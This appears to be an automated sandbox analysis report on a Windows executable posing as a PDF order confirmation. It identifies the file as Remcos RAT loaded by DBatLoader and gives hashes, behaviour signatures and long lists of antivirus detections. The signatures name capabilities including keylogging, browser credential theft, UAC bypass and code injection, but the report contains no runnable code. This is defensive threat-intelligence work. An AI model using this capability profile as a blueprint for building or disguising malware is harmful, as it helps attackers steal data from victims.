Windows Analysis Report
Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe

Overview

General Information

Sample Name: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe
Analysis ID: 652390
MD5: 8e60c68e832622b0ebd88a612898a9f9
SHA1: 99c8a0db1608b7f3fe783829f13a6a594554f142
SHA256: 6f4628db14ddcff78f5b0ad2c62f6791e4b29901eb9ef8a3686a2b7019308a99
Tags: exegeoTUR
Infos:

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Yara detected DBatLoader
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Contains functionality to capture and log keystrokes
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Contains functionality to steal Firefox passwords or cookies
Contains functionality to register a low level keyboard hook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to inject code into remote processes
Contains functionalty to change the wallpaper
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
IP address seen in connection with other malware
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe ReversingLabs: Detection: 21%
Yara detected Remcos RAT
Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Eluiezilfw.exe ReversingLabs: Detection: 21%
Antivirus or Machine Learning detection for unpacked file
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4348.64.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acbbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ac5ecc.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39600d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac1b54.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0168.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac7bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac3034.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad28f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad8008.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac0168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad17a0.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8560.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad9a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.2324788.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac00d8.18.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adbf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adafd8.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ad54e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acd700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad001c.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397afd8.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3addbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6d08.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac7bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.22.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac52c8.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964ae4.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.101.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ad54e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3974008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.23a33e8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e240.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac52c8.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad94ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395dda4.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adf8dc.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adbf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac704c.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acbbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3e08.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6d08.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.0.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad94ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad94ec.82.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.2.Eluiezilfw.exe.3168bd8.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac217c.47.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad4008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966588.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c008.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac00d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acdc40.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3add83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac26fc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac8008.21.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac26fc.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.2.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ae4008.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac03a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac1b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3962d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acbbdc.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396704c.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3add83c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac4578.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc008.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.3.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac26fc.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39603a8.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad5fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.0.logagent.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 8.3.Eluiezilfw.exe.3ac217c.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2d80.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3add83c.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad5fb8.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adbf00.63.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad4008.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39746cc.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acd700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3961b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964578.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad46cc.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3aca22c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acff08.23.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966d08.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3978008.107.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.2364588.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39626fc.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac52c8.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acc6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac03a8.27.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.logagent.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 13.3.Eluiezilfw.exe.3ad54e0.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397bf00.62.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397001c.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2dac.49.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3984008.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac4ae4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3addbec.68.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac2d80.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acd700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad46cc.95.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966c84.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 14.2.logagent.exe.1054198f.2.unpack Avira: Label: BDS/Backdoor.Gen
Source: 8.3.Eluiezilfw.exe.3ad3e08.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3adf8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac0024.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ae2814.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac8560.26.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac1b54.29.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396dc40.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac5ee4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.50.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396bbdc.14.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396c6a8.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397f8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3982814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acdc40.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.0.DpiScaling.exe.10540000.1.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 13.3.Eluiezilfw.exe.3ac4ae4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39717a0.66.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3973e08.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3abe240.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3960168.20.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3adf8dc.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac7bf0.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396a22c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3add83c.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3971194.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acc6a8.41.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.76.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac1b54.31.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3965ee4.90.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad1194.73.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad4008.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad28f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39728f8.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ae2814.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.61.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 15.2.DpiScaling.exe.400000.0.unpack Avira: Label: BDS/Backdoor.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3966924.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39794ec.80.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac803c.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395844c.5.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.22a33e8.3.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396413c.59.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad8008.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.2.Eluiezilfw.exe.10540000.8.unpack Avira: Label: TR/Crypt.Morphine.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.395e4d0.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3addbec.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad9a8c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.2.Eluiezilfw.exe.2264588.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.397dbec.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.39754e0.103.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ad3e08.77.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.396d700.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3964008.57.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3968560.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac7bf0.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6c84.100.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac6c84.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3aca22c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ac00d8.19.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac2dac.51.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3acff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 8.3.Eluiezilfw.exe.3ad3950.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe.3975fb8.44.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3acff08.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 13.3.Eluiezilfw.exe.3ac6c84.101.unpack Avira: Label: TR/Patched.Ren.Gen
